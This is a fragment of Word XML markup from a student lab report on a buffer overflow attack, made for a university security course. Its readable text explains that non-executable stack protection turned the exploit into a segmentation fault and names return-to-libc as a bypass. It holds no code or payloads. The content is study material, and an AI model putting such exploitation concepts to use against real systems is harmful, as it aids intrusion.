            <wp:extent cx="5943600" cy="1045845"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1361494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94305" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1045845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCF1A7" w14:textId="41FC4BD6" w:rsidR="004056D0" w:rsidRDefault="004056D0" w:rsidP="00B47C59">
      <w:r>
        <w:t xml:space="preserve">There is no shell access gained, the return is a segmentation fault. </w:t>
      </w:r>
      <w:r w:rsidR="00C1008F">
        <w:t>The non-executable stack protection ensures that the stack memory region is non-executable. This means that even if the exploit overflows the buffer and overwrites the return address with the address of the shellcode (which resides on the stack), the CPU will refuse to execute it. This is a significant impediment to traditional stack-based buffer overflow attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D1671" w14:textId="24BC49EA" w:rsidR="00C419D6" w:rsidRPr="00602977" w:rsidRDefault="00C419D6" w:rsidP="00B47C59">
      <w:r>
        <w:t>While the non-executable stack protection effectively counter</w:t>
      </w:r>
      <w:r w:rsidR="00E62948">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> traditional buffer overflow attacks that aim to execute shellcode placed on the stack, it doesn’t completely prevent exploitation. As the task description mentions, there are ways to exploit buffer overflows without needing it to execute code on the stack, such as the return-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C419D6" w:rsidRPr="0060297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022F6" w14:textId="77777777" w:rsidR="00892E2E" w:rsidRDefault="00892E2E" w:rsidP="00892E2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="53C366A7" w14:textId="77777777" w:rsidR="00892E2E" w:rsidRDefault="00892E2E" w:rsidP="008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73780" w14:textId="77777777" w:rsidR="00892E2E" w:rsidRDefault="00892E2E" w:rsidP="00892E2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3EFA6376" w14:textId="77777777" w:rsidR="00892E2E" w:rsidRDefault="00892E2E" w:rsidP="008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0527" w14:textId="39B2E24F" w:rsidR="00892E2E" w:rsidRDefault="00892E2E">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>COMPSCI 750 – Lab 4: Buffer Overflow Attack</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="147CCE05" w14:textId="39825655" w:rsidR="00892E2E" w:rsidRDefault="00892E2E">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2E"/>
    <w:rsid w:val="000008CA"/>
    <w:rsid w:val="00062763"/>
    <w:rsid w:val="00086074"/>
    <w:rsid w:val="000E444E"/>
    <w:rsid w:val="000E778C"/>
    <w:rsid w:val="00116A5A"/>
    <w:rsid w:val="00142534"/>
    <w:rsid w:val="00167078"/>
    <w:rsid w:val="00176DC7"/>
    <w:rsid w:val="001A5D05"/>
    <w:rsid w:val="001E62FA"/>
    <w:rsid w:val="001F6425"/>
    <w:rsid w:val="00203D9F"/>
    <w:rsid w:val="00237A29"/>
    <w:rsid w:val="00254120"/>
    <w:rsid w:val="0029083A"/>
    <w:rsid w:val="002A497D"/>
    <w:rsid w:val="002D1A3F"/>
    <w:rsid w:val="002F0BD9"/>
    <w:rsid w:val="00307436"/>
    <w:rsid w:val="0031015B"/>
    <w:rsid w:val="00316B43"/>
    <w:rsid w:val="00355E24"/>
    <w:rsid w:val="00363400"/>
    <w:rsid w:val="00367699"/>
    <w:rsid w:val="003B7E4D"/>
    <w:rsid w:val="003C5D1A"/>
    <w:rsid w:val="003E3004"/>
    <w:rsid w:val="0040068D"/>
    <w:rsid w:val="004056D0"/>
    <w:rsid w:val="00453D5E"/>
    <w:rsid w:val="004A55D1"/>
    <w:rsid w:val="004C616C"/>
    <w:rsid w:val="004E5F7C"/>
    <w:rsid w:val="005027DE"/>
    <w:rsid w:val="00505EB3"/>
    <w:rsid w:val="0056342A"/>
    <w:rsid w:val="0056668D"/>
    <w:rsid w:val="005F49CC"/>
    <w:rsid w:val="00602977"/>
    <w:rsid w:val="00633AAD"/>
    <w:rsid w:val="007E5DE1"/>
    <w:rsid w:val="00825E16"/>
    <w:rsid w:val="00892E2E"/>
    <w:rsid w:val="00894C5A"/>
    <w:rsid w:val="008B68E8"/>
    <w:rsid w:val="008C0ED4"/>
    <w:rsid w:val="009322F2"/>
    <w:rsid w:val="009559E0"/>
    <w:rsid w:val="009D2399"/>
    <w:rsid w:val="00A0248C"/>
    <w:rsid w:val="00A06425"/>
    <w:rsid w:val="00A10B26"/>
    <w:rsid w:val="00A45493"/>
    <w:rsid w:val="00A53515"/>
    <w:rsid w:val="00A843E7"/>
    <w:rsid w:val="00AC5215"/>
    <w:rsid w:val="00AD177E"/>
    <w:rsid w:val="00B22849"/>
    <w:rsid w:val="00B47C59"/>
    <w:rsid w:val="00BA3F87"/>
    <w:rsid w:val="00BA47FD"/>
    <w:rsid w:val="00C1008F"/>
    <w:rsid w:val="00C419D6"/>
    <w:rsid w:val="00C43F79"/>
    <w:rsid w:val="00C8505B"/>
    <w:rsid w:val="00C868BD"/>
    <w:rsid w:val="00C95760"/>
    <w:rsid w:val="00D064F1"/>
    <w:rsid w:val="00D162D8"/>
    <w:rsid w:val="00D25FF5"/>
    <w:rsid w:val="00D26EB8"/>
    <w:rsid w:val="00D9131D"/>
    <w:rsid w:val="00D92259"/>
    <w:rsid w:val="00DA5F99"/>
    <w:rsid w:val="00DC77E4"/>
    <w:rsid w:val="00E14792"/>
    <w:rsid w:val="00E44E86"/>
    <w:rsid w:val="00E62948"/>
    <w:rsid w:val="00E64E8B"/>
    <w:rsid w:val="00E76DFF"/>
    <w:rsid w:val="00EF063C"/>
    <w:rsid w:val="00EF3127"/>
    <w:rsid w:val="00F34F6B"/>
    <w:rsid w:val="00F567F6"/>
    <w:rsid w:val="00F57EDC"/>
    <w:rsid w:val="00F70048"/>
    <w:rsid w:val="00F7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E0DB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4582DA3-277D-4BA9-BCE3-06B70F52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E2E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008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84</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T00:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-03T04:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>